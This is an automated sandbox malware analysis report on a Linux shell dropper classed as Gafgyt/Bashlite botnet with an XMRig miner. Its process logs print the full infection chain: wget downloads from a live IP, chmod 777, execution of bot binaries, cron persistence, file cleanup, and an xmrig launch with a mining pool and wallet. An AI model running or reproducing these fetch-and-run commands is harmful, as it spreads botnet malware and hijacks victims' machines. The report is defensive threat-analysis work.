Malware Analysis Report

2024-11-13 18:03

Sample ID 241109-eqsh1sznbm
Target tyo2831qq.sh
SHA256 5f52ba20358d35d9705d4893c2e28bf333f9920d13053b21352be4a1fa6c8199
Tags
gafgyt botnet defense_evasion discovery execution persistence privilege_escalation xmrig xmrig_linux miner
score
10/10


Analysis Overview

score
10/10

SHA256

5f52ba20358d35d9705d4893c2e28bf333f9920d13053b21352be4a1fa6c8199

Threat Level: Known bad

The file tyo2831qq.sh was found to be: Known bad.

Malicious Activity Summary

gafgyt botnet defense_evasion discovery execution persistence privilege_escalation xmrig xmrig_linux miner

xmrig

Xmrig_linux family

XMRig Miner payload

Xmrig family

Detected Gafgyt variant

Gafgyt family

Gafgyt/Bashlite

Executes dropped EXE

File and Directory Permissions Modification

Creates/modifies Cron job

Legitimate hosting services abused for malware hosting/C2

Reads system routing table

Writes file to system bin folder

Reads system network configuration

Reads runtime system information

Writes file to tmp directory

System Network Configuration Discovery

MITRE ATT&CK (Enterprise Matrix V15)

Analysis: static1

Detonation Overview

Reported

2024-11-09 04:09

Signatures

N/A

Analysis: behavioral1

Detonation Overview

Submitted

2024-11-09 04:09

Reported

2024-11-09 04:11

Platform

ubuntu1804-amd64-20240611-en

Max time kernel

95s

Max time network

128s

Command Line

[/tmp/tyo2831qq.sh]

Signatures

Detected Gafgyt variant

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A

Gafgyt family

gafgyt

Gafgyt/Bashlite

botnet gafgyt

File and Directory Permissions Modification

defense_evasion
Description Indicator Process Target
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A

Executes dropped EXE

Description Indicator Process Target
N/A /tmp/bots /tmp/bots N/A
N/A /tmp/fileibWhol /tmp/fileibWhol N/A
N/A /tmp/filebGBbym /tmp/filebGBbym N/A
N/A /tmp/filedQZH4W /tmp/filedQZH4W N/A
N/A /tmp/fileIZmINp /tmp/fileIZmINp N/A
N/A /tmp/fileyOeFL0 /tmp/fileyOeFL0 N/A
N/A /tmp/filelEGrRt /tmp/filelEGrRt N/A
N/A /tmp/fileNiUUx5 /tmp/fileNiUUx5 N/A
N/A /tmp/file2WqZIz /tmp/file2WqZIz N/A
N/A /tmp/fileD5R9Xa /tmp/fileD5R9Xa N/A
N/A /tmp/fileGhyk4A /tmp/fileGhyk4A N/A
N/A /tmp/filel8AkDc /tmp/filel8AkDc N/A
N/A /tmp/fileCSmOoG /tmp/fileCSmOoG N/A
N/A /tmp/fileVJaGhi /tmp/fileVJaGhi N/A
N/A /tmp/fileGF37SJ /tmp/fileGF37SJ N/A
N/A /tmp/fileoIRPGl /tmp/fileoIRPGl N/A
N/A /tmp/fileoAru1O /tmp/fileoAru1O N/A
N/A /tmp/fileDaBA4r /tmp/fileDaBA4r N/A
N/A /tmp/filedLbafW /tmp/filedLbafW N/A
N/A /tmp/file3O8iBx /tmp/file3O8iBx N/A
N/A /tmp/fileAOvPk1 /tmp/fileAOvPk1 N/A
N/A /tmp/fileCwJsFC /tmp/fileCwJsFC N/A
N/A /tmp/fileyEYfs5 /tmp/fileyEYfs5 N/A
N/A /tmp/fileueaHmH /tmp/fileueaHmH N/A
N/A /tmp/fileH1vC07 /tmp/fileH1vC07 N/A
N/A /tmp/filem6VSkI /tmp/filem6VSkI N/A
N/A /tmp/fileh2Azrd /tmp/fileh2Azrd N/A
N/A /tmp/filexXoNQO /tmp/filexXoNQO N/A
N/A /tmp/fileOf8Bu8 /tmp/fileOf8Bu8 N/A
N/A /tmp/file4hnC0J /tmp/file4hnC0J N/A
N/A /tmp/fileI7IdvX /tmp/fileI7IdvX N/A
N/A /tmp/fileQoM44m /tmp/fileQoM44m N/A
N/A /tmp/fileLoiThM /tmp/fileLoiThM N/A
N/A /tmp/fileUnYIGZ /tmp/fileUnYIGZ N/A
N/A /tmp/filevfTFbq /tmp/filevfTFbq N/A
N/A /tmp/file3rmi0O /tmp/file3rmi0O N/A
N/A /tmp/filedOlYi6 /tmp/filedOlYi6 N/A
N/A /tmp/fileFw29Lt /tmp/fileFw29Lt N/A
N/A /tmp/fileyKTYD6 /tmp/fileyKTYD6 N/A
N/A /tmp/filenm6bft /tmp/filenm6bft N/A
N/A /tmp/fileJtGkIU /tmp/fileJtGkIU N/A
N/A /tmp/fileouKtFj /tmp/fileouKtFj N/A
N/A /tmp/filewTNYwB /tmp/filewTNYwB N/A

Creates/modifies Cron job

execution persistence privilege_escalation
Description Indicator Process Target
File opened for modification /etc/cron.hourly/0 /tmp/fileD5R9Xa N/A
File opened for modification /etc/cron.hourly/0 /tmp/fileVJaGhi N/A
File opened for modification /etc/cron.hourly/0 /tmp/fileoIRPGl N/A
File opened for modification /etc/cron.hourly/0 /tmp/file3rmi0O N/A
File opened for modification /etc/cron.hourly/0 /tmp/filedOlYi6 N/A
File opened for modification /etc/cron.hourly/0 /tmp/tyo2831qq.x86 N/A
File opened for modification /etc/cron.hourly/0 /tmp/filedQZH4W N/A
File opened for modification /etc/cron.hourly/0 /tmp/fileNiUUx5 N/A
File opened for modification /etc/cron.hourly/0 /tmp/fileCSmOoG N/A
File opened for modification /etc/cron.hourly/0 /tmp/fileAOvPk1 N/A
File opened for modification /etc/cron.hourly/0 /tmp/fileUnYIGZ N/A
File opened for modification /etc/cron.hourly/0 /tmp/fileibWhol N/A
File opened for modification /etc/cron.hourly/0 /tmp/fileCwJsFC N/A
File opened for modification /etc/cron.hourly/0 /tmp/filem6VSkI N/A
File opened for modification /etc/cron.hourly/0 /tmp/fileI7IdvX N/A
File opened for modification /etc/cron.hourly/0 /tmp/fileLoiThM N/A
File opened for modification /etc/cron.hourly/0 /tmp/filevfTFbq N/A
File opened for modification /etc/cron.hourly/0 /tmp/filenm6bft N/A
File opened for modification /etc/cron.hourly/0 /tmp/filebGBbym N/A
File opened for modification /etc/cron.hourly/0 /tmp/filedLbafW N/A
File opened for modification /etc/cron.hourly/0 /tmp/fileueaHmH N/A
File opened for modification /etc/cron.hourly/0 /tmp/fileyKTYD6 N/A
File opened for modification /etc/cron.hourly/0 /tmp/fileyOeFL0 N/A
File opened for modification /etc/cron.hourly/0 /tmp/file2WqZIz N/A
File opened for modification /etc/cron.hourly/0 /tmp/filel8AkDc N/A
File opened for modification /etc/cron.hourly/0 /tmp/fileGF37SJ N/A
File opened for modification /etc/cron.hourly/0 /tmp/fileDaBA4r N/A
File opened for modification /etc/cron.hourly/0 /tmp/fileh2Azrd N/A
File opened for modification /etc/cron.hourly/0 /tmp/file4hnC0J N/A
File opened for modification /etc/cron.hourly/0 /tmp/fileJtGkIU N/A
File opened for modification /etc/cron.hourly/0 /tmp/filelEGrRt N/A
File opened for modification /etc/cron.hourly/0 /tmp/fileoAru1O N/A
File opened for modification /etc/cron.hourly/0 /tmp/file3O8iBx N/A
File opened for modification /etc/cron.hourly/0 /tmp/fileQoM44m N/A
File opened for modification /etc/cron.hourly/0 /tmp/fileouKtFj N/A
File opened for modification /etc/cron.hourly/0 /tmp/fileIZmINp N/A
File opened for modification /etc/cron.hourly/0 /tmp/fileGhyk4A N/A
File opened for modification /etc/cron.hourly/0 /tmp/fileyEYfs5 N/A
File opened for modification /etc/cron.hourly/0 /tmp/fileH1vC07 N/A
File opened for modification /etc/cron.hourly/0 /tmp/filexXoNQO N/A
File opened for modification /etc/cron.hourly/0 /tmp/fileFw29Lt N/A
File opened for modification /etc/cron.hourly/0 /tmp/fileOf8Bu8 N/A

Reads system routing table

discovery
Description Indicator Process Target
File opened for reading /proc/net/route /tmp/tyo2831qq.i586 N/A

Writes file to system bin folder

Description Indicator Process Target
File opened for modification /bin/ls /tmp/tyo2831qq.x86 N/A

Reads system network configuration

discovery
Description Indicator Process Target
File opened for reading /proc/net/route /tmp/tyo2831qq.i586 N/A

Reads runtime system information

discovery
Description Indicator Process Target
File opened for reading /proc/self/exe /tmp/file2WqZIz N/A
File opened for reading /proc/self/exe /tmp/fileD5R9Xa N/A
File opened for reading /proc/self/exe /tmp/fileVJaGhi N/A
File opened for reading /proc/self/exe /tmp/fileoAru1O N/A
File opened for reading /proc/self/exe /tmp/fileCwJsFC N/A
File opened for reading /proc/self/exe /tmp/fileyEYfs5 N/A
File opened for reading /proc/self/exe /tmp/fileQoM44m N/A
File opened for reading /proc/self/exe /tmp/filebGBbym N/A
File opened for reading /proc/self/exe /tmp/filelEGrRt N/A
File opened for reading /proc/self/exe /tmp/fileueaHmH N/A
File opened for reading /proc/self/exe /tmp/fileH1vC07 N/A
File opened for reading /proc/self/exe /tmp/file4hnC0J N/A
File opened for reading /proc/self/exe /tmp/tyo2831qq.x86 N/A
File opened for reading /proc/self/exe /tmp/fileibWhol N/A
File opened for reading /proc/self/exe /tmp/fileAOvPk1 N/A
File opened for reading /proc/self/exe /tmp/filem6VSkI N/A
File opened for reading /proc/self/exe /tmp/fileI7IdvX N/A
File opened for reading /proc/self/exe /tmp/fileLoiThM N/A
File opened for reading /proc/self/exe /tmp/file3rmi0O N/A
File opened for reading /proc/self/exe /tmp/fileJtGkIU N/A
File opened for reading /proc/self/exe /tmp/filel8AkDc N/A
File opened for reading /proc/self/exe /tmp/fileGF37SJ N/A
File opened for reading /proc/self/exe /tmp/fileh2Azrd N/A
File opened for reading /proc/self/exe /tmp/filexXoNQO N/A
File opened for reading /proc/self/exe /tmp/fileFw29Lt N/A
File opened for reading /proc/self/exe /tmp/filewTNYwB N/A
File opened for reading /proc/self/exe /tmp/filedQZH4W N/A
File opened for reading /proc/self/exe /tmp/fileGhyk4A N/A
File opened for reading /proc/self/exe /tmp/fileDaBA4r N/A
File opened for reading /proc/self/exe /tmp/fileOf8Bu8 N/A
File opened for reading /proc/self/exe /tmp/fileCSmOoG N/A
File opened for reading /proc/self/exe /tmp/file3O8iBx N/A
File opened for reading /proc/self/exe /tmp/fileUnYIGZ N/A
File opened for reading /proc/self/exe /tmp/filedOlYi6 N/A
File opened for reading /proc/self/exe /tmp/fileyKTYD6 N/A
File opened for reading /proc/self/exe /tmp/fileIZmINp N/A
File opened for reading /proc/self/exe /tmp/fileyOeFL0 N/A
File opened for reading /proc/self/exe /tmp/fileNiUUx5 N/A
File opened for reading /proc/self/exe /tmp/filedLbafW N/A
File opened for reading /proc/self/exe /tmp/fileouKtFj N/A
File opened for reading /proc/self/exe /tmp/fileoIRPGl N/A
File opened for reading /proc/self/exe /tmp/filevfTFbq N/A
File opened for reading /proc/self/exe /tmp/filenm6bft N/A

System Network Configuration Discovery

discovery
Description Indicator Process Target
N/A N/A /tmp/tyo2831qq.mips N/A
N/A N/A /bin/rm N/A
N/A N/A /usr/bin/wget N/A

Writes file to tmp directory

Description Indicator Process Target
File opened for modification /tmp/file3O8iBx /tmp/filedLbafW N/A
File opened for modification /tmp/fileyEYfs5 /tmp/fileCwJsFC N/A
File opened for modification /tmp/fileueaHmH /tmp/fileyEYfs5 N/A
File opened for modification /tmp/fileOf8Bu8 /tmp/filexXoNQO N/A
File opened for modification /tmp/tyo2831qq.m68k /usr/bin/wget N/A
File opened for modification /tmp/tyo2831qq.x86 /usr/bin/wget N/A
File opened for modification /tmp/bots /tmp/tyo2831qq.x86 N/A
File opened for modification /tmp/fileyOeFL0 /tmp/fileIZmINp N/A
File opened for modification /tmp/filedLbafW /tmp/fileDaBA4r N/A
File opened for modification /tmp/filem6VSkI /tmp/fileH1vC07 N/A
File opened for modification /tmp/fileh2Azrd /tmp/filem6VSkI N/A
File opened for modification /tmp/bots /usr/bin/wget N/A
File opened for modification /tmp/fileibWhol /tmp/tyo2831qq.x86 N/A
File opened for modification /tmp/filedQZH4W /tmp/filebGBbym N/A
File opened for modification /tmp/fileI7IdvX /tmp/file4hnC0J N/A
File opened for modification /tmp/file3rmi0O /tmp/filevfTFbq N/A
File opened for modification /tmp/filedOlYi6 /tmp/file3rmi0O N/A
File opened for modification /tmp/filewTNYwB /tmp/fileouKtFj N/A
File opened for modification /tmp/tyo2831qq.mpsl /usr/bin/wget N/A
File opened for modification /tmp/filelEGrRt /tmp/fileyOeFL0 N/A
File opened for modification /tmp/fileVJaGhi /tmp/fileCSmOoG N/A
File opened for modification /tmp/fileoAru1O /tmp/fileoIRPGl N/A
File opened for modification /tmp/fileDaBA4r /tmp/fileoAru1O N/A
File opened for modification /tmp/tyo2831qq.arm7 /usr/bin/wget N/A
File opened for modification /tmp/fileIZmINp /tmp/filedQZH4W N/A
File opened for modification /tmp/filel8AkDc /tmp/fileGhyk4A N/A
File opened for modification /tmp/fileGF37SJ /tmp/fileVJaGhi N/A
File opened for modification /tmp/fileAOvPk1 /tmp/file3O8iBx N/A
File opened for modification /tmp/fileH1vC07 /tmp/fileueaHmH N/A
File opened for modification /tmp/file4hnC0J /tmp/fileOf8Bu8 N/A
File opened for modification /tmp/filekKP7GW /tmp/fileFw29Lt N/A
File opened for modification /tmp/fileJtGkIU /tmp/filenm6bft N/A
File opened for modification /tmp/fileX9kSc0 /tmp/filewTNYwB N/A
File opened for modification /tmp/tyo2831qq.mips /usr/bin/wget N/A
File opened for modification /tmp/filebGBbym /tmp/fileibWhol N/A
File opened for modification /tmp/fileNiUUx5 /tmp/filelEGrRt N/A
File opened for modification /tmp/fileCSmOoG /tmp/filel8AkDc N/A
File opened for modification /tmp/fileoIRPGl /tmp/fileGF37SJ N/A
File opened for modification /tmp/filevfTFbq /tmp/fileUnYIGZ N/A
File opened for modification /tmp/file2WqZIz /tmp/fileNiUUx5 N/A
File opened for modification /tmp/filexXoNQO /tmp/fileh2Azrd N/A
File opened for modification /tmp/fileQoM44m /tmp/fileI7IdvX N/A
File opened for modification /tmp/fileLoiThM /tmp/fileQoM44m N/A
File opened for modification /tmp/fileUnYIGZ /tmp/fileLoiThM N/A
File opened for modification /tmp/fileFw29Lt /tmp/filedOlYi6 N/A
File opened for modification /tmp/tyo2831qq.sh4 /usr/bin/wget N/A
File opened for modification /tmp/fileD5R9Xa /tmp/file2WqZIz N/A
File opened for modification /tmp/fileGhyk4A /tmp/fileD5R9Xa N/A
File opened for modification /tmp/fileCwJsFC /tmp/fileAOvPk1 N/A
File opened for modification /tmp/filenm6bft /tmp/fileyKTYD6 N/A
File opened for modification /tmp/fileouKtFj /tmp/fileJtGkIU N/A
File opened for modification /tmp/tyo2831qq.arm6 /usr/bin/wget N/A

Processes

/tmp/tyo2831qq.sh

[/tmp/tyo2831qq.sh]

/usr/bin/wget

[wget http://31.172.80.237/tyo2831qq.mips]

/bin/chmod

[chmod 777 tyo2831qq.mips]

/tmp/tyo2831qq.mips

[./tyo2831qq.mips]

/usr/bin/wget

[wget http://31.172.80.237/bots]

/bin/chmod

[chmod 777 bots]

/tmp/bots

[./bots]

/usr/bin/wget

[wget http://31.172.80.237/tyo2831qq.mpsl]

/bin/chmod

[chmod 777 tyo2831qq.mpsl]

/tmp/tyo2831qq.mpsl

[./tyo2831qq.mpsl]

/usr/bin/wget

[wget http://31.172.80.237/tyo2831qq.sh4]

/bin/chmod

[chmod 777 tyo2831qq.sh4]

/tmp/tyo2831qq.sh4

[./tyo2831qq.sh4]

/usr/bin/wget

[wget http://31.172.80.237/tyo2831qq.x86]

/bin/chmod

[chmod 777 tyo2831qq.x86]

/tmp/tyo2831qq.x86

[./tyo2831qq.x86]

/tmp/fileibWhol

[./tyo2831qq.x86]

/tmp/filebGBbym

[./tyo2831qq.x86]

/tmp/filedQZH4W

[./tyo2831qq.x86]

/tmp/fileIZmINp

[./tyo2831qq.x86]

/tmp/fileyOeFL0

[./tyo2831qq.x86]

/tmp/filelEGrRt

[./tyo2831qq.x86]

/tmp/fileNiUUx5

[./tyo2831qq.x86]

/tmp/file2WqZIz

[./tyo2831qq.x86]

/tmp/fileD5R9Xa

[./tyo2831qq.x86]

/tmp/fileGhyk4A

[./tyo2831qq.x86]

/tmp/filel8AkDc

[./tyo2831qq.x86]

/tmp/fileCSmOoG

[./tyo2831qq.x86]

/tmp/fileVJaGhi

[./tyo2831qq.x86]

/tmp/fileGF37SJ

[./tyo2831qq.x86]

/tmp/fileoIRPGl

[./tyo2831qq.x86]

/tmp/fileoAru1O

[./tyo2831qq.x86]

/tmp/fileDaBA4r

[./tyo2831qq.x86]

/tmp/filedLbafW

[./tyo2831qq.x86]

/tmp/file3O8iBx

[./tyo2831qq.x86]

/tmp/fileAOvPk1

[./tyo2831qq.x86]

/tmp/fileCwJsFC

[./tyo2831qq.x86]

/tmp/fileyEYfs5

[./tyo2831qq.x86]

/tmp/fileueaHmH

[./tyo2831qq.x86]

/tmp/fileH1vC07

[./tyo2831qq.x86]

/tmp/filem6VSkI

[./tyo2831qq.x86]

/tmp/fileh2Azrd

[./tyo2831qq.x86]

/tmp/filexXoNQO

[./tyo2831qq.x86]

/tmp/fileOf8Bu8

[./tyo2831qq.x86]

/tmp/file4hnC0J

[./tyo2831qq.x86]

/tmp/fileI7IdvX

[./tyo2831qq.x86]

/tmp/fileQoM44m

[./tyo2831qq.x86]

/tmp/fileLoiThM

[./tyo2831qq.x86]

/tmp/fileUnYIGZ

[./tyo2831qq.x86]

/tmp/filevfTFbq

[./tyo2831qq.x86]

/tmp/file3rmi0O

[./tyo2831qq.x86]

/tmp/filedOlYi6

[./tyo2831qq.x86]

/tmp/fileFw29Lt

[./tyo2831qq.x86]

/tmp/fileyKTYD6

[./tyo2831qq.x86]

/tmp/filenm6bft

[./tyo2831qq.x86]

/tmp/fileJtGkIU

[./tyo2831qq.x86]

/tmp/fileouKtFj

[./tyo2831qq.x86]

/tmp/filewTNYwB

[./tyo2831qq.x86]

/usr/bin/wget

[wget http://31.172.80.237/tyo2831qq.arm6]

/bin/chmod

[chmod 777 tyo2831qq.arm6]

/tmp/tyo2831qq.arm6

[./tyo2831qq.arm6]

/usr/bin/wget

[wget http://31.172.80.237/tyo2831qq.x32]

/bin/chmod

[chmod 777 tyo2831qq.i586]

/tmp/tyo2831qq.i586

[./tyo2831qq.i586]

/usr/bin/wget

[wget http://31.172.80.237/tyo2831qq.m68k]

/bin/chmod

[chmod 777 tyo2831qq.m68k]

/tmp/tyo2831qq.m68k

[./tyo2831qq.m68k]

/usr/bin/wget

[wget http://31.172.80.237/tyo2831qq.spc]

/usr/bin/wget

[wget http://31.172.80.237/tyo2831qq.arm4]

/usr/bin/wget

[wget http://31.172.80.237/tyo2831qq.arm7]

/bin/chmod

[chmod 777 tyo2831qq.arm7]

/tmp/tyo2831qq.arm7

[./tyo2831qq.arm7]

/usr/bin/wget

[wget http://31.172.80.237/tyo2831qq.arm5]

/bin/rm

[rm -rf tyo2831qq.arm6 tyo2831qq.arm7 tyo2831qq.i586 tyo2831qq.m68k tyo2831qq.mips tyo2831qq.mpsl tyo2831qq.ppc tyo2831qq.sh tyo2831qq.sh4 tyo2831qq.x32 tyo2831qq.x86]

/usr/bin/wget

[wget https://github.com/m3Mastika/Dockerfile/raw/refs/heads/main/xmrig]

/bin/chmod

[chmod 777 xmrig]

/tmp/xmrig

[./xmrig --url pool.hashvault.pro:80 --user 48mn9hwNxkfjYAppkEaghU1pRbaThMVmnFHuQT44TTDRLLaUsDNCyWDStDZ5DjUqyLaiaywMirbPp1y1zPiVgCeV35ENMV7 --pass bos -B]

Network

Country Destination Domain Proto
GB 185.125.188.61:443 N/A tcp
GB 185.125.188.61:443 N/A tcp
US 151.101.193.91:443 N/A tcp
US 151.101.193.91:443 N/A tcp
DE 31.172.80.237:80 31.172.80.237 tcp
N/A 224.0.0.251:5353 N/A udp
DE 31.172.80.237:80 31.172.80.237 tcp
GB 89.187.167.3:443 N/A tcp
DE 31.172.80.237:80 31.172.80.237 tcp
DE 31.172.80.237:80 31.172.80.237 tcp
DE 31.172.80.237:80 31.172.80.237 tcp
DE 31.172.80.237:80 31.172.80.237 tcp
DE 31.172.80.237:80 31.172.80.237 tcp
DE 31.172.80.237:706 N/A tcp
DE 31.172.80.237:80 31.172.80.237 tcp
DE 31.172.80.237:80 31.172.80.237 tcp
DE 31.172.80.237:706 N/A tcp
DE 31.172.80.237:80 31.172.80.237 tcp
DE 31.172.80.237:80 31.172.80.237 tcp
DE 31.172.80.237:80 31.172.80.237 tcp
DE 31.172.80.237:80 31.172.80.237 tcp
DE 31.172.80.237:80 31.172.80.237 tcp
US 1.1.1.1:53 github.com udp
US 1.1.1.1:53 github.com udp

Files

/tmp/bots

MD5 2615e32f9e7b42b36ba1f3dd6f8f7e3c
SHA1 4286d999a1a76da1e68cb227e01de237ef5fcf68
SHA256 e9bc9d0324b4943e9a9419c9be202331efe86a055768286b45a6ff80eb172078
SHA512 b9e21c618c03d111405f5d0e33d08a9bbe37ec6361773f02fde806a2cd784355cc43c64bce22ceeabc2a2e69f277989a26501085c6df725b8bccd9b52ce4ff78

/tmp/fileibWhol

MD5 a8a6992775589faecef1bc8cf38bdfc5
SHA1 b6903301aecf34539654f309b8c12773461920dc
SHA256 cae053bfac71081a19bd64ae66f3fc9a149bcbe492eeb46d33647e01ab18eb52
SHA512 dd803894a1bb9caa2bb4d1da70d35a531a7f76718d23392ff7ee511f489f413f2c79e82a3d7432685a36f470b69c74d211d18d050bee1a5d261c75131ee58fb8

/etc/cron.hourly/0

MD5 3f006f7f81fc17be7f4a0d3da0fad5de
SHA1 97a94d3d0654c6551057af3809b52572bd7f9f5d
SHA256 982f9e0f089b91ba79df723435099df15c72e1201a45010ee60226ab136c93bf
SHA512 97d2ac0057427b940ada7c0fc805c1966e2535c3c3767ca85fef4a7e0fdc9d4ef9eb133530408b1e439df067881cb317e948ad9bfd487e958a04c97d9db978e0

/tmp/fileibWhol

MD5 4ac062e7bafef554949de20763c54f7b
SHA1 24355a299d9aca3953a9fac256cdaf7be0249fda
SHA256 33368eb166229b262cb964cfa6412478278b2a23e5f0c3de24a56c28dac5eeb0
SHA512 b12f82c346dbe62b6a96e7c9d3185eb2fdca9cc29ba83e29a102fd746c93d72d919d8146840ab9338dc8a25a7fb2b400a0cd9d0ac2ea5a0471d283f81d115bb9

/tmp/bots

MD5 b0f19b181c8d6961d1fed5bda4def843
SHA1 6e00805b0e6204b1d0c249550567a385e2835226
SHA256 f4893c325586305fa20901ae1fa6059cc0fac29c57e915a2c6f79c99bb9b9bf7
SHA512 997cec78ea201ea7aafc17178dad49193832807971e2f56cbed487a17f1fb287f585f1022613e32ac70c0eac89ca9c253e4e860a2aa23589dc733fe8f8c94e9a

Analysis: behavioral2

Detonation Overview

Submitted

2024-11-09 04:09

Reported

2024-11-09 04:11

Platform

debian9-armhf-20240418-en

Max time kernel

95s

Max time network

96s

Command Line

[/tmp/tyo2831qq.sh]

Signatures

File and Directory Permissions Modification

defense_evasion
Description Indicator Process Target
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A

Executes dropped EXE

Description Indicator Process Target
N/A /tmp/bots /tmp/bots N/A

Reads system routing table

discovery
Description Indicator Process Target
File opened for reading /proc/net/route /tmp/tyo2831qq.arm7 N/A
File opened for reading /proc/net/route /tmp/tyo2831qq.arm6 N/A
File opened for reading /proc/net/route /tmp/tyo2831qq.ppc N/A

Reads system network configuration

discovery
Description Indicator Process Target
File opened for reading /proc/net/route /tmp/tyo2831qq.ppc N/A
File opened for reading /proc/net/route /tmp/tyo2831qq.arm7 N/A
File opened for reading /proc/net/route /tmp/tyo2831qq.arm6 N/A

System Network Configuration Discovery

discovery
Description Indicator Process Target
N/A N/A /usr/bin/wget N/A
N/A N/A /tmp/tyo2831qq.mips N/A
N/A N/A /bin/rm N/A

Writes file to tmp directory

Description Indicator Process Target
File opened for modification /tmp/tyo2831qq.mpsl /usr/bin/wget N/A
File opened for modification /tmp/tyo2831qq.ppc /usr/bin/wget N/A
File opened for modification /tmp/tyo2831qq.i586 /usr/bin/wget N/A
File opened for modification /tmp/tyo2831qq.arm7 /usr/bin/wget N/A
File opened for modification /tmp/tyo2831qq.mips /usr/bin/wget N/A
File opened for modification /tmp/tyo2831qq.sh4 /usr/bin/wget N/A
File opened for modification /tmp/tyo2831qq.x86 /usr/bin/wget N/A
File opened for modification /tmp/tyo2831qq.arm6 /usr/bin/wget N/A
File opened for modification /tmp/tyo2831qq.x32 /usr/bin/wget N/A
File opened for modification /tmp/tyo2831qq.m68k /usr/bin/wget N/A
File opened for modification /tmp/bots /usr/bin/wget N/A

Processes

/tmp/tyo2831qq.sh

[/tmp/tyo2831qq.sh]

/usr/bin/wget

[wget http://31.172.80.237/tyo2831qq.mips]

/bin/chmod

[chmod 777 tyo2831qq.mips]

/tmp/tyo2831qq.mips

[./tyo2831qq.mips]

/usr/bin/wget

[wget http://31.172.80.237/bots]

/bin/chmod

[chmod 777 bots]

/tmp/bots

[./bots]

/usr/bin/wget

[wget http://31.172.80.237/tyo2831qq.mpsl]

/bin/chmod

[chmod 777 tyo2831qq.mpsl]

/tmp/tyo2831qq.mpsl

[./tyo2831qq.mpsl]

/usr/bin/wget

[wget http://31.172.80.237/tyo2831qq.sh4]

/bin/chmod

[chmod 777 tyo2831qq.sh4]

/tmp/tyo2831qq.sh4

[./tyo2831qq.sh4]

/usr/bin/wget

[wget http://31.172.80.237/tyo2831qq.x86]

/bin/chmod

[chmod 777 tyo2831qq.x86]

/tmp/tyo2831qq.x86

[./tyo2831qq.x86]

/usr/bin/wget

[wget http://31.172.80.237/tyo2831qq.arm6]

/bin/chmod

[chmod 777 tyo2831qq.arm6]

/tmp/tyo2831qq.arm6

[./tyo2831qq.arm6]

/usr/bin/wget

[wget http://31.172.80.237/tyo2831qq.x32]

/bin/chmod

[chmod 777 tyo2831qq.x32]

/tmp/tyo2831qq.x32

[./tyo2831qq.x32]

/usr/bin/wget

[wget http://31.172.80.237/tyo2831qq.ppc]

/bin/chmod

[chmod 777 tyo2831qq.ppc]

/tmp/tyo2831qq.ppc

[./tyo2831qq.ppc]

/usr/bin/wget

[wget http://31.172.80.237/tyo2831qq.i586]

/bin/chmod

[chmod 777 tyo2831qq.i586]

/tmp/tyo2831qq.i586

[./tyo2831qq.i586]

/usr/bin/wget

[wget http://31.172.80.237/tyo2831qq.m68k]

/bin/chmod

[chmod 777 tyo2831qq.m68k]

/tmp/tyo2831qq.m68k

[./tyo2831qq.m68k]

/usr/bin/wget

[wget http://31.172.80.237/tyo2831qq.spc]

/usr/bin/wget

[wget http://31.172.80.237/tyo2831qq.arm4]

/usr/bin/wget

[wget http://31.172.80.237/tyo2831qq.arm7]

/bin/chmod

[chmod 777 tyo2831qq.arm7]

/tmp/tyo2831qq.arm7

[./tyo2831qq.arm7]

/usr/bin/wget

[wget http://31.172.80.237/tyo2831qq.arm5]

/bin/rm

[rm -rf tyo2831qq.arm6 tyo2831qq.arm7 tyo2831qq.i586 tyo2831qq.m68k tyo2831qq.mips tyo2831qq.mpsl tyo2831qq.ppc tyo2831qq.sh tyo2831qq.sh4 tyo2831qq.x32 tyo2831qq.x86]

/usr/bin/wget

[wget https://github.com/m3Mastika/Dockerfile/raw/refs/heads/main/xmrig]

/bin/chmod

[chmod 777 xmrig]

/tmp/xmrig

[./xmrig --url pool.hashvault.pro:80 --user 48mn9hwNxkfjYAppkEaghU1pRbaThMVmnFHuQT44TTDRLLaUsDNCyWDStDZ5DjUqyLaiaywMirbPp1y1zPiVgCeV35ENMV7 --pass bos -B]

Network

Country Destination Domain Proto
DE 31.172.80.237:80 31.172.80.237 tcp
DE 31.172.80.237:80 31.172.80.237 tcp
DE 31.172.80.237:80 31.172.80.237 tcp
DE 31.172.80.237:80 31.172.80.237 tcp
DE 31.172.80.237:80 31.172.80.237 tcp
DE 31.172.80.237:80 31.172.80.237 tcp
DE 31.172.80.237:706 N/A tcp
DE 31.172.80.237:80 31.172.80.237 tcp
DE 31.172.80.237:80 31.172.80.237 tcp
DE 31.172.80.237:706 N/A tcp
DE 31.172.80.237:80 31.172.80.237 tcp
DE 31.172.80.237:80 31.172.80.237 tcp
DE 31.172.80.237:80 31.172.80.237 tcp
DE 31.172.80.237:80 31.172.80.237 tcp
DE 31.172.80.237:80 31.172.80.237 tcp
DE 31.172.80.237:706 N/A tcp
DE 31.172.80.237:80 31.172.80.237 tcp
US 1.1.1.1:53 github.com udp

Files

/tmp/bots

MD5 2615e32f9e7b42b36ba1f3dd6f8f7e3c
SHA1 4286d999a1a76da1e68cb227e01de237ef5fcf68
SHA256 e9bc9d0324b4943e9a9419c9be202331efe86a055768286b45a6ff80eb172078
SHA512 b9e21c618c03d111405f5d0e33d08a9bbe37ec6361773f02fde806a2cd784355cc43c64bce22ceeabc2a2e69f277989a26501085c6df725b8bccd9b52ce4ff78

Analysis: behavioral3

Detonation Overview

Submitted

2024-11-09 04:09

Reported

2024-11-09 04:11

Platform

debian9-mipsbe-20240611-en

Max time kernel

150s

Max time network

95s

Command Line

[/tmp/tyo2831qq.sh]

Signatures

File and Directory Permissions Modification

defense_evasion
Description Indicator Process Target
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
